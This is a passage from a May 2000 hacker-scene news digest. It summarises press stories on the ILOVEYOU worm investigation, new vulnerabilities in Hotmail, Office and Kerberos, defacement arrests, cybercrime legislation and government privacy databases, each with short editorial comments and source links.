      their role with the ILOVEYOU virus/worm are in fact the author of the
      code. James Atkinson from the Granite Island Group feels that the true
      author is Anjabi, a 15 to 17 year old girl who lives near the current
      suspects.
      
      Wired
      
      Suspect Ordered Released
      The 27-year-old bank employee that has been arrested in connection
      with The ILOVEYOU virus/worm has been released. Reonel Ramones had
      been arrested and charged the violating the Access Devices Regulation
      Act. Police, however, have not been able to compile enough evidence to
      hold the man forcing them to let him go pending the collection of more
      evidence. He will still be forced to appear in court on May 19 to
      answer the preliminary charges.
      
      Reuters - via Yahoo
      
      Manila Police Now Looking for 10 Suspects
      Philippine police said that they are now looking for up to ten people
      who may have had access to computers at the AMA Computer College. The
      couple currently under investigation has attended the college in the
      past.
      
      Reuters - via Yahoo
      
      http://www.wired.com/news/politics/0,1283,36203,00.html
      http://dailynews.yahoo.com/h/nm/20000509/ts/virus_philippines_13.html
      http://dailynews.yahoo.com/h/nm/20000509/ts/virus_philippines_10.html
      ----------
      
 04.0 [HNN] May 09'00 Brace Yourselves For the SuperVirus 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      While this article is sensationalistic, full of hype and FUD, it does
      make and important point. ILOVEYOU was not as bad as it could have
      been. Just think if it was targeted against other types of files, .exe
      for instance. Or if it had been an auto executable with no user
      intervention required?
      
      London Observer
      
      http://shns.scripps.com/shns/story.cfm?pk
      ----------
      
 05.0 [HNN] May 09'00 NIPC Accused of Dragging Feet 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Brian 
      The National Infrastructure Protection Center was critized for
      overreacting to the recent 911 virus that had minimal impact and now
      is being critized again for not reacting strong enough to ILOVEYOU.
      Sen. Robert Bennett, R-Utah wants to investigate whether NIPC's
      response was quick enough.
      
      Newsbytes
      NIPC - Latest Advisory
      
      http://www.newsbytes.com/pubNews/00/148613.html
      http://www.nipc.gov/nipc/alert00-041e.htm
      @HWA
      
 06.0 [HNN] May 09'00 Classified Systems Hit 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      ILOVEYOU somehow managed to jump the air gap and infected at least
      four Department of Defense classified systems. DoD said that the
      infection was quickly quarantined and that The Joint Task Force on
      Computer Network Defense will be investigating how the classified
      systems became infected.
      
      Government Executive Magazine
      
      http://www.govexec.com/dailyfed/0500/050800j1.htm
      @HWA
      
 07.0 [HNN] May 09'00 Mitnick in Online Chat 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      contributed by apocalyse 
      Despite being banned from touching a computer or anything connected to
      the Internet for three years, Kevin Mitnick was able to participate in
      an online chat with ABC News. The topic of discussion was of course
      the ILOVEYOU virus/worm.
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/chat_000508mitnick.html
      @HWA
      
 08.0 [HNN] May 09'00 Phreakers In the White House 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by major 
      The FBI is conducting an investigation into whether the White House
      phone system has been breached. The breach may have involved the "real
      time" interception of telephone conversations. The FBI has been
      investigating Amdocs, a Chesterfield Mo., telecommunications billing
      company who assisted Bell Atlantic with installing telephone lines at
      the White House in 1997. The FBI has tried to get an arrest warrant
      for a suspect however a senior law enforcement official told Fox News
      that "to suggest that the phones at the White House have been
      penetrated is not supported by the facts."
      
      Fox News
      
      http://www.foxnews.com/national/050500/phonebreach.sml
      @HWA
      
 09.0 [HNN] May 09'00 MS vs Netscape in Blame for Security Hole 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopolyse
      Microsoft and Netscape Communications are pointing fingers at each
      other over a browser-related security problem that neither company has
      any intention of fixing. (Do I have to say more?)
      
      C|Net
      
      http://news.cnet.com/news/0-1005-200-1820959.html?tag
      @HWA
      
 10.0 [HNN] May 09'00 Hacker vs. Cracker The Debate Continues 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Weld Pond 
      Blair Shewchuk, a journalist with the Canadian Broadcasting Company,
      has published a really good treatise on why media outlets continue to
      use the word 'hacker' instead of 'cracker' or some other alternative.
      While he may be correct in that you can not force people to use
      different words or change their meanings in the dictionary you can
      send a hell of a lot of emails. (Personally we prefer the word
      attacker or criminal, much less confusion with that.)
      
      Canadian Broadcasting Company
      
      http://cbc.ca/news/indepth/words/hack.html
      @HWA
 
 11.0 [HNN] May 10'00 Buffer Overflow: The Name Game: Groking the Love Bug 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   
   
      
      contributed by McIntyre 
      The media frenzy surrounding the ILOVEYOU or 'Love Bug' virus/worm has
      resulted in several contradictions within the press. Event the
      National Bureau of Investigation can't seem to gets its facts
      straight. Things like names, relationships, and damage estimates would
      seem to be pretty standard and easy things to report on, or are they?
      McIntyre takes a look at these questions and more in the latest
      article in the Buffer Overflow.
      
      Buffer Overflow
      
      @HWA
      
 12.0 [HNN] May 10'00 New Virus/Worm On The Loose, Friendmess.A 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Space Rogue 
      While based on ILOVEYOU Friendmess.A is different enough to be
      considered a separate entity and not a variant. After being infected
      by Friendmess the virus/worm will delete files from the Windows
      directory including Windows/System and Windows/Temp. While the danger
      from Friendmess is high it is not spreading as fast as ILOVEYOU.
      
      ZD Net
      
      http://www.zdnet.com/zdhelp/stories/main/0,5594,2566037,00.html
      @HWA
      
 13.0 [HNN] May 10'00 YTCracker Busted For Web Defacement 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by ytcracker 
      YTCracker has been arrested and charged with one count each of
      computer crime and criminal mischief for defacing the web site of the
      city of Colorado Springs last October. The two felony charges carry a
      maximum penalty of two years of juvenile detention.
      
      The Gazette
      Attrition.org - Mirrors of YTCrackers Defacements
      
      http://www.gazette.com/daily/top3.html
      http://www.attrition.org/mirror/attrition/ytcracker.html
      @HWA
      
 14.0 [HNN] May 10'00 Gov Security Laws Introduced At Summit 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Senator Fred Thompson (R-Tennessee) has introduced legislation that
      would require the federal government to conduct yearly checks of the
      security of its computer systems and force managers of those systems
      to prove they are secure. The Government Information Security Act was
      introduced at the Internet Defense Summit and was been approved the
      Government Affairs Committee Tuesday.
      
      Wired
      
      http://www.wired.com/news/politics/0,1283,36223,00.html
      @HWA
      
 15.0 [HNN] May 10'00 Internet Fraud Complaint Center Launched By DoJ 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench and acopalyse 
      Janet Reno has announced the creation of The Internet Fraud Complaint
      Center, a joint venture launched by the FBI and National White Collar
      Crime Center. The new center will be aimed at providing better
      coordination among law enforcement agencies in tackling complaints of
      fraud on the Internet.
      
      Government Executive Magazine
      E Commerce Times
      Internet Fraud Complaint Center
      
      http://www.govexec.com/dailyfed/0500/050900b1.htm
      http://www.ecommercetimes.com/news/articles2000/000509-3.shtml
      https://www.ifccfbi.gov/
      @HWA
      
 16.0 [HNN] May 10'00 And Yet Another Hole Found In Hotmail 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalypse Dow 
      If a Hotmail user clicks on an attachment that contains a Javascript
      Trojan horse, an attacker can read, send, and delete messages from
      that person's account. Microsoft said that they would look into the
      issue a fix if needed.
      
      Wired
      
      http://www.wired.com/news/technology/0,1282,36241,00.html
      @HWA
      
      
 17.0 [HNN] May 11'00 Solar Sunrise, Now on Video 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by yeza 
      Solar Sunrise, the code name for what was once described as "the most
      organized and systematic attack the Pentagon has seen to date" is now
      out of video. A training tape produced by National Infrastructure
      Protection Center is now available for $12.28 from FilmComm. But read
      the review first. (Our tax dollars hard at work making videos of a
      couple of punk kids.)
      
      ZD Net - Scathing Solar Sunrise Review
      FilmComm
      
      http://www.zdnet.com/intweek/stories/columns/0,4164,2567361,00.html
      http://www.filmcomm.com
      @HWA
      
 18.0 [HNN] May 11'00 Network Manager Sent to Jail For Destroying His Network 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by McIntyre 
      In the first federal criminal prosecution of computer sabotage a
      network manager, who spent ten and a half years building the network,
      was found guilty of destroying what he had built. Tim Lloyd, 37, of
      Wilmington, Del. had deleted all the files that controlled the
      companies manufacturing process three weeks after he had been fired.
      Omega Engineering, a high-tech measurement and instrumentation
      manufacturer, has estimated that it lost more than $10 million. Mr.
      Lloyd could face at least five years in federal prison, sentencing has
      been scheduled for July 31.
      
      The Industry Standard
      
      http://www.thestandard.com/article/display/0,1151,14938,00.html
      @HWA
      
 19.0 [HNN] May 11'00 Lawmakers Upset Over ILOVEYOU 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Kevin 
      In a hearing on Wednesday the House Science Committee's panel on
      technology criticized the Anti-Virus industry for failing to protect
      the nation against the ILOVEYOU virus/worm. During the hearing
      Congressman Gutknecht said he was contemplating drafting a bill that
      would make it illegal for software companies to hire former hackers.
      Peter Tippett, chief scientist at Virginia-based computer security
      assurance firm ICSA.net went so far as to suggest that the mere act of
      writing a virus should be made illegal. (And so the hysteria begins.)
      
      Security Focus
      
      http://www.securityfocus.com/news/32
      @HWA
      
 20.0 [HNN] May 11'00 Intel Motherboards Could Destroy Files 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Code Kid
      Intel has admitted that nearly one million motherboards, that have
      shipped since November, may have a defective 'memory translator hub'
      that could experiences problems in transferring data between the SDRAM
      and the 820 Intel processor. Intel said that the defect could cause
      some systems to intermittently reset, reboot, hang or possibly cause
      data corruption. The motherboards have been shipped to numerous
      suppliers including Dell and Compaq as well as third party
      manufacturers. Intel has said it will replace the defective parts but
      urges customers to contact their dealer.
      
      Nando Times
      C|Net
      
      http://www.nandotimes.com/technology/story/body/0,1634,500202708-50028
      0641-501498167-0,00.html
      http://news.cnet.com/news/0-1006-201-1851632-0.html?tag
      @HWA
      
 21.0 [HNN] May 11'00 Hackers and the Tools They Use 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Crypt0pimP 
      So what should you get out of your $150,000 penetration test? Someone
      fresh out of school who knows how to run ISS and that is it? Or should
      you be getting a more thorough test of your network?
      
      SunWorld
      
      http://www.sunworld.com/sunworldonline/swol-05-2000/swol-05-security.h
      tml
      @HWA
      
      
 22.0 [HNN] May 11'00 HackerNews Brazil and SecureNet Forced To Remove Content 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no 
      The web site http://www.hackernews.com.br and Secure Net, also based
      in Brazil, have been forced to remove their defaced page archives.
      Brazil's legal system decided that the defacement mirror archives
      hosted on the sites were a incentive to criminal activity and forced
      them to be removed.
      
      Terra - Portuguese
      
      The web site http://www.hackernews.com.br and Secure Net, also based
      in
      http://www.terra.com.br/informatica/2000/05/09/021.htm
      @HWA
      
 23.0 [HNN] May 12'00 ILOVEYOU May Have Been An Accident 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      A Philippino computer student has admitted that he may have been the
      one who released the ILOVEYOU virus/worm but that it was an accident.
      However, he would not admit to writing the virus. Investigators have
      said they want to talk with with Onel A. de Guzman but declined to
      identify him as a suspect.
      
      Nando Times
      
      http://www.nandotimes.com/technology/story/body/0,1634,500203055-50028
      1301-501504037-0,00.html
      @HWA
      
 24.0 [HNN] May 12'00 Windows Labeled 'Virus Friendly' 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Experts are criticizing Microsoft for making software that has
      features that few people want or need but that make it extremely easy
      for viruses to spread. Windows Scripting Host and Visual Basic are two
      of the features named that come standard with every installation that
      assist if not promote the spread of malicious code.
      
      The Industry Standard
      
      http://www.thestandard.com/article/article_print/1,1153,15019,00.html
      @HWA
      
      
 25.0 [HNN] May 12'00 PBS Looses Subscriber Info 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by sean.o 
      The Public Broadcasting System based in Lewiston Maine, suffered an
      electronic intrusion into its billing system. Officials have said that
      they do not now if any of the personal information, including names,
      phone numbers, addresses and credit card numbers of it's 63,000 radio
      and television members had even been looked at let alone copied and
      downloaded. The station said that it is warning its members just in
      case.
      
      Associated Press - San Jose Mercury News
      
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/58851l.htm
      @HWA
      
 26.0 [HNN] May 12'00 Anonymous User Sues Yahoo For Releasing Identity 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Space Rogue
      After having his identity revealed to AnswerThink Consulting an
      anonymous user is suing Yahoo for not notifying him that his identity
      had been revealed. The civil suit charges Yahoo, Inc., with invasion
      of privacy, breach of contract, negligent misrepresentation, and
      unfair competition and false advertising. Yahoo revealed the names of
      several posters to an AnswerThink message board after being
      subpoenaed. The user, known as 'Aquacool_2000' is being supported by
      ACLU and EPIC.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2567806,00.html
      @HWA
      
 27.0 [HNN] May 12'00 Smart Cards Labeled Secure 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      On May 5th the National Institute of Standards and Technology issued a
      (FIPS) Pub 140-1 certification to the Spyrus'9 Rosetta Smart Card.
      This is the first smart card to receive such certification. The
      certification makes this card eligible to participate in the GSAs $1
      Billion government wide smart card contract.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0508/web-fips-05-11-00.asp
      @HWA
      
 28.0 [HNN] May 12'00 Cyber Attackers on Television 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by PhantasmP 
      This Saturday (May 13th) America's Most wanted is airing an episode
      about cyber terrorism. The write up in the print edition of TV Guide
      is as follows: "Examining U.S. government efforts to stop criminal
      computer hackers, who can disrupt vital city services." The online
      edition says "Cyber-Criminals Special Edition: An overview of cyber
      terrorism includes easy targets; wide-ranging effects; and a profile
      of a dangerous hacker." The show is scheduled to air at 9pm EST on FOX
      Networks. (Like this won't be full of FUD.)
      
      TV Guide
      America's Most Wanted
      
      http://www.tvguide.com/listings/index.asp?view
      http://www.amw.com/site/thisweek/index.html
      @HWA
 
 29.0 [HNN] May 15'00 Love Bug Suspect Denies All 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Brian
      Michael Buen, who has been suspected of writing the ILOVEYOU
      virus/worm has denied all involvement. "I should like to categorically
      state for the record that I have no involvement or participation
      whatsoever in the design, development, creation or dissemination of
      the `'ILOVEYOU' virus," Buen said in a statement.
      
      Associated Press - San Jose Mercury News
      ZD Net
      
      http://www.mercurycenter.com/svtech/news/breaking/ap/docs/67301l.htm
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2569390,00.html?ch
      kpt
      @HWA
      
 30.0 [HNN] May 15'00 Microsoft Found to Be Threat to National Security 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Cult hero 
      A two part essay that explains why Microsoft is bad for the country
      has been posted. The first part focuses on the serious security
      shortcomings of Windows while part 2 focuses on the laws the software
      industry has passed to protect themselves from any liability.
      
      InfoWarrior
      
      Microsoft Criticism Mounts
      After Melissa Microsoft had over a year to address security concerns
      about the tight integration of its email client with other parts of
      its operating system. Now system administrators are criticizing the
      company for letting the problem grow out of hand instead of attempting
      to minimize the potential threat.
      
      ZD Net
      
      http://www.infowarrior.org/articles.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2568904,00.html
      @HWA
      
 31.0 [HNN] May 15'00 G8 to Discuss Cybercrime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime 
      The Group of Eight (G8) will meet in Paris today for a three day
      discussion about the increasing threat of online crime.
      
      ZD Net
      APB Online
      BBC
      
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2569395,00.html?ch
      kpt
      http://www.apbnews.com/newscenter/internetcrime/2000/05/14/netcrime051
      4_01.html
      http://news.bbc.co.uk/hi/english/world/europe/newsid_748000/748597.stm
      @HWA
      
 32.0 [HNN] May 15'00 VA Described as Wide Open To Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      An internal memo circulating within the Veterans Administration has
      listed 18 different vulnerabilities in computer systems at the
      organization. VA computer security is said to be so weak that it
      continues to be a target for attack. The VA spends $1 Billion of
      taxpayers money per year on computer systems.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0508/web-va-05-12-00.asp
      @HWA
      
 33.0 [HNN] May 15'00 Bank Web Site Breached 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by weknowu 
      The web site of the Saraswat co-operative bank in India was breached
      by a group of attackers who claimed they where testing its security.
      The attackers gained access to customer account information but where
      unable to initiate any online transactions. Bank officials have said
      that they have closed the security hole.
      
      Times Of India
      
      http://www.timesofindia.com/120500/12mpun3.htm
      @HWA
      
      
 34.0 [HNN] May 15'00  Koreans Host 'Hacking Contest' 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The Korea Advanced Institute of Science and Technology (KAIST) will
      hold an international hacking contest from June 27 to the 30th. A
      prize of $50,000 will be awarded for the top finisher, and $20,000 and
      $10,000 to the second- and third-place finishers, respectively.
      (Another lame attempt at publicity, these contests do nothing to test
      security or gain information.)
      
      Korea Herald
      Korea Advanced Institute of Science and Technology
      
      http://www.koreaherald.co.kr/news/2000/05/__10/20000515_1023.htm
      http://www.kaist.ac.kr/edex.html
      @HWA
      
 35.0 [HNN] May 15'00 America's Most Wanted Hit with DoS 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by sleestack 
      After lumping hackers in with murders and serial rapists the web site
      for America's Most Wanted became unreachable. Experts theorize that
      the site came under a heavy denial of service attack after airing a
      segment on cyber-crime which asked users to phone in tips on the
      recent attacks that hit Yahoo, CNN, and others.
      
      Security Focus
      America's Most Wanted
      
      http://www.securityfocus.com/news/34
      http://www.amw.com
      @HWA
      
 36.0 [HNN] May 15'00 Greisling Responds 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by David 
      Chicago Tribune columnist David Greising published a scathing article
      on hackers last week that said we should all be locked up as
      criminals. This week he responds in a slightly calmer tone. (At least
      he substituted the word cybervandel once in this weeks column. Not
      much but a start.)
      
      Hackers Hardly Huggable; Let's Get Serious - May 7
      Hackers weigh in, and are they ... uh ... hacked off - May 14
      
      Mr. Greising included some carefully shosen statements out of the
      emails that he received for his article. HNN received a few of those
      same emails which we publish here in their entirety.
      
      Letters to David Greising
      
      http://www.chicagotribune.com/business/columnists/greising/0,1122,SAV-
      0005070041,00.html
      http://chicagotribune.com/business/columnists/greising/
      @HWA
      
 
 37.0 [HNN] May 17'00 Microsoft Security Spanked Again 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by turtlex 
      Microsoft Office 2000 ships with an ActiveX control named "Microsoft
      Office UA Control". Most users probably recognize it as the sickening
      friendly little paper clip character that makes annoying noises and
      faces at you while you work. It is installed by default and is
      categorized as being "safe for scripting" which could allow an
      attacker to write a script that would allow them to do anything on the
      victims computer including deleting files.
      
      ZD Net
      Fairfax IT
      @stake L0pht Labs - Advisory
      Microsoft - Patch
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2570727,00.html
      http://www.it.fairfax.com.au/breaking/20000515/A62291-2000May15.html
      http://www.l0pht.com/advisories/msoua.txt
      http://www.microsoft.com/technet/security/bulletin/ms00-034.asp
      @HWA
      
 38.0 [HNN] May 17'00 Canada's Big Brother Revealed 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by pyr8 
      Canada's federal Privacy Commissioner, Bruce Phillips, has revealed a
      massive computerized database that contains volumes of personal data
      on 33.7 million Canadian's living and dead. The database was started
      fifteen years ago by the Office of Employment and Immigration and is
      used to research and evaluate the effectiveness of the federal
      employment insurance program. The database contains information
      regarding tax returns, child tax benefits, provincial and municipal
      welfare files, federal jobs, job training and other information. There
      are proposals to expand the database to include additional data on
      social assistance recipients from provinces and territories, the
      Canada Student Loan Program, the Canada Pension Plan and Old Age
      Security Program.
      
      Ottawa Citizen
      
      http://www.ottawacitizen.com/national/000517/4116449.html
      @HWA
      
      
 39.0 [HNN] May 17'00 Code on Disk Points Finger At Suspect 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      A disk taken from the home of Onel A. de Guzman contains a copy of a
      different virus that bears a striking resemblance to the ILOVEYOU
      virus/worm. According to the National Bureau of Investigation this new
      virus was written by Michael Buen. Mr. Buen has denied any and all
      involvement in the case.
      
      Associated Press - via Yahoo
      
      http://dailynews.yahoo.com/h/ap/20000516/tc/computer_love_bug_74.html
      @HWA
      
      
 40.0 [HNN] May 17'00 List of ILOVEYOU Suspects Grows 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Authorities are now looking at over 40 people as possible authors of
      the recent ILOVEYOU virus/worm. Most of the suspects are students at
      Manila's Amable Mendoza Aguiluz Computer College.
      
      Industry Standard - via Yahoo
      
      http://dailynews.yahoo.com/h/is/20000516/bs/list_of_love_bug_suspects_
      grows_1.html
      @HWA
      
      
 41.0 [HNN] May 17'00 Return of the Phreaker 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      This article uses a few scare tactics but obviously when connecting
      telephone and network systems together it is imperative to ensure that
      adequate security controls are in place. Some experts theorize that
      soon Phreakers will need to penetrate the Internet to access phone
      systems. A complete reversal of roles when it was the computer
      underground that needed access to the phone systems to access
      computers.
      
      Wired
      
      http://www.wired.com/news/business/0,1367,36309,00.html
      @HWA
      
 42.0 [HNN] May 17'00 Hope 2000 Announces Plans 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Macki 
      HOPE 2000 has announced a mock DeCSS trial and that they are currently
      recruiting DJs and bands. They will soon announce the speaker list. In
      an interesting side development the real DeCSS trial date has been
      moved to the Monday after h2k.
      
      HOPE 2000
      
      http://www.h2k.net/
      @HWA
      
 43.0 [HNN] May 17'00 More and more E-zines 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Kynik 
      Issue 5 of the Napalm e-zine has been released, covering contemporary
      telenet, ethernet, music reviews, and various reader questions and
      comments. Fobidden Knowledge has released FK-11.
      
      Napalm
      Forbidden Knowledge - Official Distribution Site
      
      http://napalm.firest0rm.org/
      http://www.effkay.za.net
      @HWA
      
 
 44.0 [HNN] May 18'00  UCITA May Help Computer Attackers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      The Uniform Computer Information Transactions Act (UCITA) has been
      accused of giving computer attackers backdoor access into computer
      systems. The law allows software manufacturers to install backdoors
      into the software so that they can control licensing agreements.
      Experts fear that these backdoors will be exploited by criminals who
      are looking to cause havoc.
      
      BBC
      
      http://news.bbc.co.uk/hi/english/sci/tech/newsid_752000/752180.stm
      @HWA
      
      
  45.0 [HNN] May 18'00  H.R.3489 To Limit Eavesdropping 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by evenprime 
      The House Commerce Committee has voted to make it a crime to sell
      anything that can decode PCS cellular, pager traffic, or encrypted
      radio transmissions for the purposes of unauthorized interception. The
      ban was quietly attached to a tax harmonization bill as an amendment
      to the Communications Act of 1934. The bill, known as the Wireless
      Telecommunications Sourcing and Privacy Act, is expected to go before
      the Senate soon. (Instead of fixing the protcol lets just make it
      illegal.)
      
      Wired
      H.R.3489
      
      http://www.wired.com/news/politics/0,1283,36401,00.html
      http://thomas.loc.gov/cgi-bin/bdquery/z?d106:h.r.03489:
      @HWA
      
      
 46.0 [HNN] May 18'00 Congressional Records Reveals Officers Social Security Numbers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Arik 
      Using public information found on military web sites a New Jersey man
      has admitted that he created fake credit card accounts for some of the
      nations highest-ranking military officers. Lamar Christian, of
      Trenton, N.J., said he got the information including social security
      numbers from a web site. The owner of the web site says he got them
      from the Congressional Record where the numbers used to be published
      when an officer was promoted. Christian is scheduled to be sentenced
      on August third and could face up to four years in jail.
      
      Associated Press - via ABC News
      
      http://abcnews.go.com/wire/US/ap20000517_684.html
      @HWA
      
      
 47.0 [HNN] May 18'00 G8 Finds No Quick Fix For Cyber Crime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      While meeting in Paris, the worlds industrialized countries said they
      wanted faster and more specialized responses to online crime but at
      the same time did not want to hurt online economic growth. The group
      stressed cooperation, not only between countries but between
      government, law enforcement, and corporations. They plan to meet again
      on the topic in July.
      
      Reuters - via Wired
      Associated Press - via USA Today
      Industry Standard - via Yahoo
      
      http://www.wired.com/news/politics/0,1283,36398,00.html
      http://www.usatoday.com/life/cyber/tech/cth930.htm
      http://dailynews.yahoo.com/h/is/20000517/bs/group_unveils_net-security
      _recommendations_1.html
      @HWA
      
 48.0 [HNN] May 18'00 Philippines Has No CyberCrime Law - Suspect Can Not be Prosecuted 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      A senior Department of Justice official has said that the access
      control device law will not apply in the ILOVEYOU virus/worm case.
      This severely hampers the investigation and it is unknown what
      direction it will take next. (If no crime has been committed then why
      are they wasting resources looking for the perpetrator?)
      
      Associated Press - via Yahoo
      
      http://dailynews.yahoo.com/h/ap/20000517/tc/computer_love_bug_76.html
      @HWA
      
 49.0 [HNN] May 18'00 Multiple Holes Found in Kerberos 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The Computer Emergency Response Team at Carnegie Mellon has issued an
      advisory warning users of several buffer overflow conditions that
      exists in the Kerberos authentication system. These holes could allow
      an intruder root access to a system and effect both versions 4 and 5.
      
      CERT
      
      http://www.cert.org/advisories/CA-2000-06.html
      @HWA
      
      
 50.0 [HNN] May 18'00 Interview with OpenBSD Creator 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      An interview with the creator OpenBSD, the only operating system that
      is constantly scoured for security flaws, has been posted to Upside.
      Theo de Raadt, the open source projects leader, has some interesting
      things to say about his project and the world around him.
      
      Upside
      Open BSD
      
      http://www.upside.com/Open_Season/3921a9080.html
      http://www.openbsd.org
      @HWA
      
 51.0 [HNN] May 18'00 RIAA Looking For Targets 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Troy 
      The RIAA has filed a lawsuit against SuperPimp Software, a small share
      ware developer of news reading software. No they aren't infringing on
      copyrights themselves, they just happen to produce software that could
      potentially be used to infringe on others copyrights. The issue is the
      article attachment decoder which could be used to decode copyrighted
      mp3s found in news groups. (Glad someone is fighting them.)
      
      Super Pimp Software
      
      http://www.superpimp.org
      @HWA
      
 52.0 [HNN] May 18'00 Canadian BB DB Clippings 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Adam 
      
      Yesterday we reported on the massive database Canada keeps on it
      citizens that was recently discovered. Today government officials are
      trying to minimize the damage.
      
      Global Mail
      
      "Human Resources Minister Jane Stewart said she saw nothing wrong with
      collecting vast amounts of information on Canadians in centralized
      databanks, noting that it has been done since 1985."
      
      National Post
      
      "Anne McLellan, the Justice Minister, yesterday said her officials
      will review outdated federal privacy legislation after a respected
      watchdog revealed that the government has created a computer database
      that puts the privacy of millions of Canadians at risk."
      
